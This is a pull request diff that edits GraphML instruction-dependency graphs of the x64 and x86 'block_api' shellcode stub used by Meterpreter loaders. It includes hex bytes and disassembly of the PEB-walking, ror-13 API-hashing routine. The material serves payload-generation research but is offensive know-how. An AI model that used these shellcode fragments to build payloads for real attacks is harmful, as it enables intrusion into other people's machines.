### PR TITLE
Meterpreter Loader Improvements

### DIFF
--- a/data/shellcode/block_api.x64.graphml
+++ b/data/shellcode/block_api.x64.graphml
@@ -7,10 +7,10 @@
   <graph edgedefault="directed">
     <node id="block.0x1000">
       <data key="address">0x1000</data>
-      <data key="type">block</data>
+      <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
         <data key="address">0x1000</data>
-        <data key="type">block</data>
+        <data key="type">instructions</data>
         <node id="block.0x1000:instruction.0x1000">
           <data key="address">0x1000</data>
           <data key="type">instruction</data>
@@ -77,10 +77,10 @@
     </node>
     <node id="block.0x1017">
       <data key="address">0x1017</data>
-      <data key="type">block</data>
+      <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
         <data key="address">0x1017</data>
-        <data key="type">block</data>
+        <data key="type">instructions</data>
         <node id="block.0x1017:instruction.0x1017">
           <data key="address">0x1017</data>
           <data key="type">instruction</data>
@@ -101,14 +101,14 @@
         </node>
       </graph>
     </node>
-    <node id="block.0x1026">
-      <data key="address">0x1026</data>
-      <data key="type">block</data>
+    <node id="block.0x1023">
+      <data key="address">0x1023</data>
+      <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x1026</data>
-        <data key="type">block</data>
-        <node id="block.0x1026:instruction.0x1026">
-          <data key="address">0x1026</data>
+        <data key="address">0x1023</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1023:instruction.0x1023">
+          <data key="address">0x1023</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4831c0</data>
           <data key="instruction.source">xor rax, rax</data>
@@ -136,28 +136,28 @@
         <edge source="block.0x1026:instruction.0x102a" target="block.0x1026:instruction.0x102c"/>
       </graph>
     </node>
-    <node id="block.0x102e">
-      <data key="address">0x102e</data>
-      <data key="type">block</data>
+    <node id="block.0x102b">
+      <data key="address">0x102b</data>
+      <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x102e</data>
-        <data key="type">block</data>
-        <node id="block.0x102e:instruction.0x102e">
-          <data key="address">0x102e</data>
+        <data key="address">0x102b</data>
+        <data key="type">instructions</data>
+        <node id="block.0x102b:instruction.0x102b">
+          <data key="address">0x102b</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">2c20</data>
           <data key="instruction.source">sub al, 0x20</data>
         </node>
       </graph>
     </node>
-    <node id="block.0x1030">
-      <data key="address">0x1030</data>
-      <data key="type">block</data>
+    <node id="block.0x102d">
+      <data key="address">0x102d</data>
+      <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x1030</data>
-        <data key="type">block</data>
-        <node id="block.0x1030:instruction.0x1030">
-          <data key="address">0x1030</data>
+        <data key="address">0x102d</data>
+        <data key="type">instructions</data>
+        <node id="block.0x102d:instruction.0x102d">
+          <data key="address">0x102d</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">41c1c90d</data>
           <data key="instruction.source">ror r9d, 0xd</data>
@@ -178,14 +178,14 @@
         <edge source="block.0x1030:instruction.0x1034" target="block.0x1030:instruction.0x1037"/>
       </graph>
     </node>
-    <node id="block.0x1039">
-      <data key="address">0x1039</data>
-      <data key="type">block</data>
+    <node id="block.0x1036">
+      <data key="address">0x1036</data>
+      <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x1039</data>
-        <data key="type">block</data>
-        <node id="block.0x1039:instruction.0x1039">
-          <data key="address">0x1039</data>
+        <data key="address">0x1036</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1036:instruction.0x1036">
+          <data key="address">0x1036</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">52</data>
           <data key="instruction.source">push rdx</data>
@@ -236,14 +236,14 @@
         <edge source="block.0x1039:instruction.0x1046" target="block.0x1039:instruction.0x104c"/>
       </graph>
     </node>
-    <node id="block.0x104e">
-      <data key="address">0x104e</data>
-      <data key="type">block</data>
+    <node id="block.0x104b">
+      <data key="address">0x104b</data>
+      <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x104e</data>
-        <data key="type">block</data>
-        <node id="block.0x104e:instruction.0x104e">
-          <data key="address">0x104e</data>
+        <data key="address">0x104b</data>
+        <data key="type">instructions</data>
+        <node id="block.0x104b:instruction.0x104b">
+          <data key="address">0x104b</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">8b8088000000</data>
           <data key="instruction.source">mov eax, dword ptr [rax + 0x88]</data>
@@ -264,14 +264,14 @@
         <edge source="block.0x104e:instruction.0x1054" target="block.0x104e:instruction.0x1057"/>
       </graph>
     </node>
-    <node id="block.0x1059">
-      <data key="address">0x1059</data>
-      <data key="type">block</data>
+    <node id="block.0x1056">
+      <data key="address">0x1056</data>
+      <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x1059</data>
-        <data key="type">block</data>
-        <node id="block.0x1059:instruction.0x1059">
-          <data key="address">0x1059</data>
+        <data key="address">0x1056</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1056:instruction.0x1056">
+          <data key="address">0x1056</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4801d0</data>
           <data key="instruction.source">add rax, rdx</data>
@@ -306,28 +306,28 @@
         <edge source="block.0x1059:instruction.0x1060" target="block.0x1059:instruction.0x1064"/>
       </graph>
     </node>
-    <node id="block.0x1067">
-      <data key="address">0x1067</data>
-      <data key="type">block</data>
+    <node id="block.0x1064">
+      <data key="address">0x1064</data>
+      <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x1067</data>
-        <data key="type">block</data>
-        <node id="block.0x1067:instruction.0x1067">
-          <data key="address">0x1067</data>
+        <data key="address">0x1064</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1064:instruction.0x1064">
+          <data key="address">0x1064</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">e353</data>
           <data key="instruction.source">jrcxz 0x10bc</data>
         </node>
       </graph>
     </node>
-    <node id="block.0x1069">
-      <data key="address">0x1069</data>
-      <data key="type">block</data>
+    <node id="block.0x1066">
+      <data key="address">0x1066</data>
+      <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x1069</data>
-        <data key="type">block</data>
-        <node id="block.0x1069:instruction.0x1069">
-          <data key="address">0x1069</data>
+        <data key="address">0x1066</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1066:instruction.0x1066">
+          <data key="address">0x1066</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">48ffc9</data>
           <data key="instruction.source">dec rcx</data>
@@ -355,14 +355,14 @@
         <edge source="block.0x1069:instruction.0x106c" target="block.0x1069:instruction.0x1070"/>
       </graph>
     </node>
-    <node id="block.0x1078">
-      <data key="address">0x1078</data>
-      <data key="type">block</data>
+    <node id="block.0x1073">
+      <data key="address">0x1073</data>
+      <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x1078</data>
-        <data key="type">block</data>
-        <node id="block.0x1078:instruction.0x1078">
-          <data key="address">0x1078</data>
+        <data key="address">0x1073</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1073:instruction.0x1073">
+          <data key="address">0x1073</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4831c0</data>
           <data key="instruction.source">xor rax, rax</data>
@@ -408,13 +408,19 @@
         <edge source="block.0x1078:instruction.0x1083" target="block.0x1078:instruction.0x1085"/>
       </graph>
     </node>
-    <node id="block.0x1087">
-      <data key="address">0x1087</data>
-      <data key="type">block</data>
+    <node id="block.0x1082">
+      <data key="address">0x1082</data>
+      <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x1087</data>
-        <data key="type">block</data>
-        <node id="block.0x1087:instruction.0x1087">
+        <data key="address">0x1082</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1082:instruction.0x1082">
+          <data key="address">0x1082</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4c034c2408</data>
+          <data key="instruction.source">add r9, qword ptr [rsp + 8]</data>
+        </node>
+        <node id="block.0x1082:instruction.0x1087">
           <data key="address">0x1087</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4539d1</data>
@@ -431,10 +437,10 @@
     </node>
     <node id="block.0x108c">
       <data key="address">0x108c</data>
-      <data key="type">block</data>
+      <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
         <data key="address">0x108c</data>
-        <data key="type">block</data>
+        <data key="type">instructions</data>
         <node id="block.0x108c:instruction.0x108c">
           <data key="address">0x108c</data>
           <data key="type">instruction</data>
@@ -585,10 +591,10 @@
     </node>
     <node id="block.0x10bc">
       <data key="address">0x10bc</data>
-      <data key="type">block</data>
+      <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
         <data key="address">0x10bc</data>
-        <data key="type">block</data>
+        <data key="type">instructions</data>
         <node id="block.0x10bc:instruction.0x10bc">
           <data key="address">0x10bc</data>
           <data key="type">instruction</data>
@@ -599,10 +605,10 @@
     </node>
     <node id="block.0x10bd">
       <data key="address">0x10bd</data>
-      <data key="type">block</data>
+      <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
         <data key="address">0x10bd</data>
-        <data key="type">block</data>
+        <data key="type">instructions</data>
         <node id="block.0x10bd:instruction.0x10bd">
           <data key="address">0x10bd</data>
           <data key="type">instruction</data>

--- a/data/shellcode/block_api.x64.graphml
+++ b/data/shellcode/block_api.x64.graphml
@@ -4,6 +4,7 @@
   <key id="type" for="all" attr.name="type" attr.type="string"/>
   <key id="instruction.source" for="node" attr.name="instruction.source" attr.type="string"/>
   <key id="instruction.hex" for="node" attr.name="instruction.hex" attr.type="string"/>
+  <key id="data.hex" for="node" attr.name="data.hex" attr.type="string"/>
   <graph edgedefault="directed">
     <node id="block.0x1000">
       <data key="address">0x1000</data>
@@ -67,9 +68,12 @@
         </node>
         <edge source="block.0x1000:instruction.0x1000" target="block.0x1000:instruction.0x1002"/>
         <edge source="block.0x1000:instruction.0x1002" target="block.0x1000:instruction.0x1004"/>
-        <edge source="block.0x1000:instruction.0x1004" target="block.0x1000:instruction.0x1007"/>
         <edge source="block.0x1000:instruction.0x1004" target="block.0x1000:instruction.0x1005"/>
+        <edge source="block.0x1000:instruction.0x1004" target="block.0x1000:instruction.0x1007"/>
         <edge source="block.0x1000:instruction.0x1005" target="block.0x1000:instruction.0x1006"/>
+        <edge source="block.0x1000:instruction.0x1006" target="block.0x1000:instruction.0x100a"/>
+        <edge source="block.0x1000:instruction.0x1006" target="block.0x1000:instruction.0x100f"/>
+        <edge source="block.0x1000:instruction.0x1006" target="block.0x1000:instruction.0x1013"/>
         <edge source="block.0x1000:instruction.0x1007" target="block.0x1000:instruction.0x100a"/>
         <edge source="block.0x1000:instruction.0x100a" target="block.0x1000:instruction.0x100f"/>
         <edge source="block.0x1000:instruction.0x100f" target="block.0x1000:instruction.0x1013"/>
@@ -101,14 +105,14 @@
         </node>
       </graph>
     </node>
-    <node id="block.0x1023">
-      <data key="address">0x1023</data>
+    <node id="block.0x1026">
+      <data key="address">0x1026</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x1023</data>
+        <data key="address">0x1026</data>
         <data key="type">instructions</data>
-        <node id="block.0x1023:instruction.0x1023">
-          <data key="address">0x1023</data>
+        <node id="block.0x1026:instruction.0x1026">
+          <data key="address">0x1026</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4831c0</data>
           <data key="instruction.source">xor rax, rax</data>
@@ -132,32 +136,33 @@
           <data key="instruction.source">jl 0x1030</data>
         </node>
         <edge source="block.0x1026:instruction.0x1026" target="block.0x1026:instruction.0x1029"/>
+        <edge source="block.0x1026:instruction.0x1026" target="block.0x1026:instruction.0x102a"/>
         <edge source="block.0x1026:instruction.0x1029" target="block.0x1026:instruction.0x102a"/>
         <edge source="block.0x1026:instruction.0x102a" target="block.0x1026:instruction.0x102c"/>
       </graph>
     </node>
-    <node id="block.0x102b">
-      <data key="address">0x102b</data>
+    <node id="block.0x102e">
+      <data key="address">0x102e</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x102b</data>
+        <data key="address">0x102e</data>
         <data key="type">instructions</data>
-        <node id="block.0x102b:instruction.0x102b">
-          <data key="address">0x102b</data>
+        <node id="block.0x102e:instruction.0x102e">
+          <data key="address">0x102e</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">2c20</data>
           <data key="instruction.source">sub al, 0x20</data>
         </node>
       </graph>
     </node>
-    <node id="block.0x102d">
-      <data key="address">0x102d</data>
+    <node id="block.0x1030">
+      <data key="address">0x1030</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x102d</data>
+        <data key="address">0x1030</data>
         <data key="type">instructions</data>
-        <node id="block.0x102d:instruction.0x102d">
-          <data key="address">0x102d</data>
+        <node id="block.0x1030:instruction.0x1030">
+          <data key="address">0x1030</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">41c1c90d</data>
           <data key="instruction.source">ror r9d, 0xd</data>
@@ -178,14 +183,14 @@
         <edge source="block.0x1030:instruction.0x1034" target="block.0x1030:instruction.0x1037"/>
       </graph>
     </node>
-    <node id="block.0x1036">
-      <data key="address">0x1036</data>
+    <node id="block.0x1039">
+      <data key="address">0x1039</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x1036</data>
+        <data key="address">0x1039</data>
         <data key="type">instructions</data>
-        <node id="block.0x1036:instruction.0x1036">
-          <data key="address">0x1036</data>
+        <node id="block.0x1039:instruction.0x1039">
+          <data key="address">0x1039</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">52</data>
           <data key="instruction.source">push rdx</data>
@@ -226,9 +231,11 @@
           <data key="instruction.hex">756f</data>
           <data key="instruction.source">jne 0x10bd</data>
         </node>
-        <edge source="block.0x1039:instruction.0x1039" target="block.0x1039:instruction.0x103c"/>
         <edge source="block.0x1039:instruction.0x1039" target="block.0x1039:instruction.0x103a"/>
-        <edge source="block.0x1039:instruction.0x103a" target="block.0x1039:instruction.0x104c"/>
+        <edge source="block.0x1039:instruction.0x1039" target="block.0x1039:instruction.0x103c"/>
+        <edge source="block.0x1039:instruction.0x103a" target="block.0x1039:instruction.0x103c"/>
+        <edge source="block.0x1039:instruction.0x103a" target="block.0x1039:instruction.0x1040"/>
+        <edge source="block.0x1039:instruction.0x103a" target="block.0x1039:instruction.0x1046"/>
         <edge source="block.0x1039:instruction.0x103c" target="block.0x1039:instruction.0x1040"/>
         <edge source="block.0x1039:instruction.0x103c" target="block.0x1039:instruction.0x1043"/>
         <edge source="block.0x1039:instruction.0x1040" target="block.0x1039:instruction.0x1043"/>
@@ -236,14 +243,14 @@
         <edge source="block.0x1039:instruction.0x1046" target="block.0x1039:instruction.0x104c"/>
       </graph>
     </node>
-    <node id="block.0x104b">
-      <data key="address">0x104b</data>
+    <node id="block.0x104e">
+      <data key="address">0x104e</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x104b</data>
+        <data key="address">0x104e</data>
         <data key="type">instructions</data>
-        <node id="block.0x104b:instruction.0x104b">
-          <data key="address">0x104b</data>
+        <node id="block.0x104e:instruction.0x104e">
+          <data key="address">0x104e</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">8b8088000000</data>
           <data key="instruction.source">mov eax, dword ptr [rax + 0x88]</data>
@@ -264,14 +271,14 @@
         <edge source="block.0x104e:instruction.0x1054" target="block.0x104e:instruction.0x1057"/>
       </graph>
     </node>
-    <node id="block.0x1056">
-      <data key="address">0x1056</data>
+    <node id="block.0x1059">
+      <data key="address">0x1059</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x1056</data>
+        <data key="address">0x1059</data>
         <data key="type">instructions</data>
-        <node id="block.0x1056:instruction.0x1056">
-          <data key="address">0x1056</data>
+        <node id="block.0x1059:instruction.0x1059">
+          <data key="address">0x1059</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4801d0</data>
           <data key="instruction.source">add rax, rdx</data>
@@ -303,31 +310,34 @@
         <edge source="block.0x1059:instruction.0x1059" target="block.0x1059:instruction.0x105c"/>
         <edge source="block.0x1059:instruction.0x1059" target="block.0x1059:instruction.0x105d"/>
         <edge source="block.0x1059:instruction.0x1059" target="block.0x1059:instruction.0x1060"/>
+        <edge source="block.0x1059:instruction.0x1059" target="block.0x1059:instruction.0x1064"/>
+        <edge source="block.0x1059:instruction.0x105c" target="block.0x1059:instruction.0x105d"/>
+        <edge source="block.0x1059:instruction.0x105c" target="block.0x1059:instruction.0x1060"/>
         <edge source="block.0x1059:instruction.0x1060" target="block.0x1059:instruction.0x1064"/>
       </graph>
     </node>
-    <node id="block.0x1064">
-      <data key="address">0x1064</data>
+    <node id="block.0x1067">
+      <data key="address">0x1067</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x1064</data>
+        <data key="address">0x1067</data>
         <data key="type">instructions</data>
-        <node id="block.0x1064:instruction.0x1064">
-          <data key="address">0x1064</data>
+        <node id="block.0x1067:instruction.0x1067">
+          <data key="address">0x1067</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">e353</data>
           <data key="instruction.source">jrcxz 0x10bc</data>
         </node>
       </graph>
     </node>
-    <node id="block.0x1066">
-      <data key="address">0x1066</data>
+    <node id="block.0x1069">
+      <data key="address">0x1069</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x1066</data>
+        <data key="address">0x1069</data>
         <data key="type">instructions</data>
-        <node id="block.0x1066:instruction.0x1066">
-          <data key="address">0x1066</data>
+        <node id="block.0x1069:instruction.0x1069">
+          <data key="address">0x1069</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">48ffc9</data>
           <data key="instruction.source">dec rcx</data>
@@ -350,19 +360,19 @@
           <data key="instruction.hex">448b4c2408</data>
           <data key="instruction.source">mov r9d, dword ptr [rsp + 8]</data>
         </node>
-        <edge source="block.0x1069:instruction.0x1069" target="block.0x1069:instruction.0x1070"/>
         <edge source="block.0x1069:instruction.0x1069" target="block.0x1069:instruction.0x106c"/>
+        <edge source="block.0x1069:instruction.0x1069" target="block.0x1069:instruction.0x1070"/>
         <edge source="block.0x1069:instruction.0x106c" target="block.0x1069:instruction.0x1070"/>
       </graph>
     </node>
-    <node id="block.0x1073">
-      <data key="address">0x1073</data>
+    <node id="block.0x1078">
+      <data key="address">0x1078</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x1073</data>
+        <data key="address">0x1078</data>
         <data key="type">instructions</data>
-        <node id="block.0x1073:instruction.0x1073">
-          <data key="address">0x1073</data>
+        <node id="block.0x1078:instruction.0x1078">
+          <data key="address">0x1078</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4831c0</data>
           <data key="instruction.source">xor rax, rax</data>
@@ -408,19 +418,13 @@
         <edge source="block.0x1078:instruction.0x1083" target="block.0x1078:instruction.0x1085"/>
       </graph>
     </node>
-    <node id="block.0x1082">
-      <data key="address">0x1082</data>
+    <node id="block.0x1087">
+      <data key="address">0x1087</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x1082</data>
+        <data key="address">0x1087</data>
         <data key="type">instructions</data>
-        <node id="block.0x1082:instruction.0x1082">
-          <data key="address">0x1082</data>
-          <data key="type">instruction</data>
-          <data key="instruction.hex">4c034c2408</data>
-          <data key="instruction.source">add r9, qword ptr [rsp + 8]</data>
-        </node>
-        <node id="block.0x1082:instruction.0x1087">
+        <node id="block.0x1087:instruction.0x1087">
           <data key="address">0x1087</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4539d1</data>
@@ -555,29 +559,38 @@
           <data key="instruction.hex">ffe0</data>
           <data key="instruction.source">jmp rax</data>
         </node>
-        <edge source="block.0x108c:instruction.0x108c" target="block.0x108c:instruction.0x10a7"/>
         <edge source="block.0x108c:instruction.0x108c" target="block.0x108c:instruction.0x108d"/>
         <edge source="block.0x108c:instruction.0x108c" target="block.0x108c:instruction.0x1099"/>
-        <edge source="block.0x108c:instruction.0x108d" target="block.0x108c:instruction.0x10a0"/>
+        <edge source="block.0x108c:instruction.0x108c" target="block.0x108c:instruction.0x10a0"/>
+        <edge source="block.0x108c:instruction.0x108c" target="block.0x108c:instruction.0x10a7"/>
         <edge source="block.0x108c:instruction.0x108d" target="block.0x108c:instruction.0x1091"/>
-        <edge source="block.0x108c:instruction.0x1091" target="block.0x108c:instruction.0x1099"/>
-        <edge source="block.0x108c:instruction.0x1091" target="block.0x108c:instruction.0x10ad"/>
+        <edge source="block.0x108c:instruction.0x108d" target="block.0x108c:instruction.0x10a0"/>
+        <edge source="block.0x108c:instruction.0x108d" target="block.0x108c:instruction.0x10b8"/>
         <edge source="block.0x108c:instruction.0x1091" target="block.0x108c:instruction.0x1094"/>
-        <edge source="block.0x108c:instruction.0x1094" target="block.0x108c:instruction.0x10a0"/>
+        <edge source="block.0x108c:instruction.0x1091" target="block.0x108c:instruction.0x1099"/>
+        <edge source="block.0x108c:instruction.0x1091" target="block.0x108c:instruction.0x109d"/>
+        <edge source="block.0x108c:instruction.0x1091" target="block.0x108c:instruction.0x10ad"/>
         <edge source="block.0x108c:instruction.0x1094" target="block.0x108c:instruction.0x1099"/>
+        <edge source="block.0x108c:instruction.0x1094" target="block.0x108c:instruction.0x10a0"/>
         <edge source="block.0x108c:instruction.0x1094" target="block.0x108c:instruction.0x10ac"/>
-        <edge source="block.0x108c:instruction.0x1099" target="block.0x108c:instruction.0x10a0"/>
+        <edge source="block.0x108c:instruction.0x1094" target="block.0x108c:instruction.0x10b8"/>
         <edge source="block.0x108c:instruction.0x1099" target="block.0x108c:instruction.0x109d"/>
-        <edge source="block.0x108c:instruction.0x109d" target="block.0x108c:instruction.0x10a7"/>
+        <edge source="block.0x108c:instruction.0x1099" target="block.0x108c:instruction.0x10a0"/>
+        <edge source="block.0x108c:instruction.0x1099" target="block.0x108c:instruction.0x10b8"/>
         <edge source="block.0x108c:instruction.0x109d" target="block.0x108c:instruction.0x10a0"/>
+        <edge source="block.0x108c:instruction.0x109d" target="block.0x108c:instruction.0x10a4"/>
+        <edge source="block.0x108c:instruction.0x109d" target="block.0x108c:instruction.0x10a7"/>
         <edge source="block.0x108c:instruction.0x109d" target="block.0x108c:instruction.0x10ad"/>
+        <edge source="block.0x108c:instruction.0x10a0" target="block.0x108c:instruction.0x10a4"/>
         <edge source="block.0x108c:instruction.0x10a0" target="block.0x108c:instruction.0x10a7"/>
         <edge source="block.0x108c:instruction.0x10a0" target="block.0x108c:instruction.0x10ac"/>
-        <edge source="block.0x108c:instruction.0x10a0" target="block.0x108c:instruction.0x10a4"/>
+        <edge source="block.0x108c:instruction.0x10a0" target="block.0x108c:instruction.0x10b8"/>
         <edge source="block.0x108c:instruction.0x10a4" target="block.0x108c:instruction.0x10ad"/>
+        <edge source="block.0x108c:instruction.0x10a4" target="block.0x108c:instruction.0x10b4"/>
         <edge source="block.0x108c:instruction.0x10a4" target="block.0x108c:instruction.0x10ba"/>
         <edge source="block.0x108c:instruction.0x10a7" target="block.0x108c:instruction.0x10a9"/>
         <edge source="block.0x108c:instruction.0x10a9" target="block.0x108c:instruction.0x10ab"/>
+        <edge source="block.0x108c:instruction.0x10a9" target="block.0x108c:instruction.0x10ae"/>
         <edge source="block.0x108c:instruction.0x10ab" target="block.0x108c:instruction.0x10ac"/>
         <edge source="block.0x108c:instruction.0x10ac" target="block.0x108c:instruction.0x10ad"/>
         <edge source="block.0x108c:instruction.0x10ad" target="block.0x108c:instruction.0x10ae"/>

--- a/data/shellcode/block_api.x86.graphml
+++ b/data/shellcode/block_api.x86.graphml
@@ -4,6 +4,7 @@
   <key id="type" for="all" attr.name="type" attr.type="string"/>
   <key id="instruction.source" for="node" attr.name="instruction.source" attr.type="string"/>
   <key id="instruction.hex" for="node" attr.name="instruction.hex" attr.type="string"/>
+  <key id="data.hex" for="node" attr.name="data.hex" attr.type="string"/>
   <graph edgedefault="directed">
     <node id="block.0x1000">
       <data key="address">0x1000</data>
@@ -47,8 +48,11 @@
           <data key="instruction.hex">8b5214</data>
           <data key="instruction.source">mov edx, dword ptr [edx + 0x14]</data>
         </node>
-        <edge source="block.0x1000:instruction.0x1000" target="block.0x1000:instruction.0x1003"/>
         <edge source="block.0x1000:instruction.0x1000" target="block.0x1000:instruction.0x1001"/>
+        <edge source="block.0x1000:instruction.0x1000" target="block.0x1000:instruction.0x1003"/>
+        <edge source="block.0x1000:instruction.0x1000" target="block.0x1000:instruction.0x1005"/>
+        <edge source="block.0x1000:instruction.0x1000" target="block.0x1000:instruction.0x1009"/>
+        <edge source="block.0x1000:instruction.0x1000" target="block.0x1000:instruction.0x100c"/>
         <edge source="block.0x1000:instruction.0x1003" target="block.0x1000:instruction.0x1005"/>
         <edge source="block.0x1000:instruction.0x1005" target="block.0x1000:instruction.0x1009"/>
         <edge source="block.0x1000:instruction.0x1009" target="block.0x1000:instruction.0x100c"/>
@@ -80,14 +84,14 @@
         </node>
       </graph>
     </node>
-    <node id="block.0x1018">
-      <data key="address">0x1018</data>
+    <node id="block.0x101b">
+      <data key="address">0x101b</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x1018</data>
+        <data key="address">0x101b</data>
         <data key="type">instructions</data>
-        <node id="block.0x1018:instruction.0x1018">
-          <data key="address">0x1018</data>
+        <node id="block.0x101b:instruction.0x101b">
+          <data key="address">0x101b</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">31c0</data>
           <data key="instruction.source">xor eax, eax</data>
@@ -111,32 +115,33 @@
           <data key="instruction.source">jl 0x1024</data>
         </node>
         <edge source="block.0x101b:instruction.0x101b" target="block.0x101b:instruction.0x101d"/>
+        <edge source="block.0x101b:instruction.0x101b" target="block.0x101b:instruction.0x101e"/>
         <edge source="block.0x101b:instruction.0x101d" target="block.0x101b:instruction.0x101e"/>
         <edge source="block.0x101b:instruction.0x101e" target="block.0x101b:instruction.0x1020"/>
       </graph>
     </node>
-    <node id="block.0x101f">
-      <data key="address">0x101f</data>
+    <node id="block.0x1022">
+      <data key="address">0x1022</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x101f</data>
+        <data key="address">0x1022</data>
         <data key="type">instructions</data>
-        <node id="block.0x101f:instruction.0x101f">
-          <data key="address">0x101f</data>
+        <node id="block.0x1022:instruction.0x1022">
+          <data key="address">0x1022</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">2c20</data>
           <data key="instruction.source">sub al, 0x20</data>
         </node>
       </graph>
     </node>
-    <node id="block.0x1021">
-      <data key="address">0x1021</data>
+    <node id="block.0x1024">
+      <data key="address">0x1024</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x1021</data>
+        <data key="address">0x1024</data>
         <data key="type">instructions</data>
-        <node id="block.0x1021:instruction.0x1021">
-          <data key="address">0x1021</data>
+        <node id="block.0x1024:instruction.0x1024">
+          <data key="address">0x1024</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">c1cf0d</data>
           <data key="instruction.source">ror edi, 0xd</data>
@@ -164,14 +169,14 @@
         <edge source="block.0x1024:instruction.0x1029" target="block.0x1024:instruction.0x102a"/>
       </graph>
     </node>
-    <node id="block.0x1029">
-      <data key="address">0x1029</data>
+    <node id="block.0x102c">
+      <data key="address">0x102c</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x1029</data>
+        <data key="address">0x102c</data>
         <data key="type">instructions</data>
-        <node id="block.0x1029:instruction.0x1029">
-          <data key="address">0x1029</data>
+        <node id="block.0x102c:instruction.0x102c">
+          <data key="address">0x102c</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">52</data>
           <data key="instruction.source">push edx</data>
@@ -220,23 +225,26 @@
         </node>
         <edge source="block.0x102c:instruction.0x102c" target="block.0x102c:instruction.0x102d"/>
         <edge source="block.0x102c:instruction.0x102c" target="block.0x102c:instruction.0x102e"/>
-        <edge source="block.0x102c:instruction.0x102d" target="block.0x102c:instruction.0x103b"/>
+        <edge source="block.0x102c:instruction.0x102d" target="block.0x102c:instruction.0x102e"/>
+        <edge source="block.0x102c:instruction.0x102d" target="block.0x102c:instruction.0x1031"/>
+        <edge source="block.0x102c:instruction.0x102d" target="block.0x102c:instruction.0x1036"/>
         <edge source="block.0x102c:instruction.0x102e" target="block.0x102c:instruction.0x1031"/>
         <edge source="block.0x102c:instruction.0x102e" target="block.0x102c:instruction.0x1034"/>
         <edge source="block.0x102c:instruction.0x1031" target="block.0x102c:instruction.0x1034"/>
         <edge source="block.0x102c:instruction.0x1034" target="block.0x102c:instruction.0x1036"/>
+        <edge source="block.0x102c:instruction.0x1034" target="block.0x102c:instruction.0x1039"/>
         <edge source="block.0x102c:instruction.0x1036" target="block.0x102c:instruction.0x1039"/>
         <edge source="block.0x102c:instruction.0x1039" target="block.0x102c:instruction.0x103b"/>
       </graph>
     </node>
-    <node id="block.0x103a">
-      <data key="address">0x103a</data>
+    <node id="block.0x103d">
+      <data key="address">0x103d</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x103a</data>
+        <data key="address">0x103d</data>
         <data key="type">instructions</data>
-        <node id="block.0x103a:instruction.0x103a">
-          <data key="address">0x103a</data>
+        <node id="block.0x103d:instruction.0x103d">
+          <data key="address">0x103d</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">01d0</data>
           <data key="instruction.source">add eax, edx</data>
@@ -268,17 +276,20 @@
         <edge source="block.0x103d:instruction.0x103d" target="block.0x103d:instruction.0x103f"/>
         <edge source="block.0x103d:instruction.0x103d" target="block.0x103d:instruction.0x1040"/>
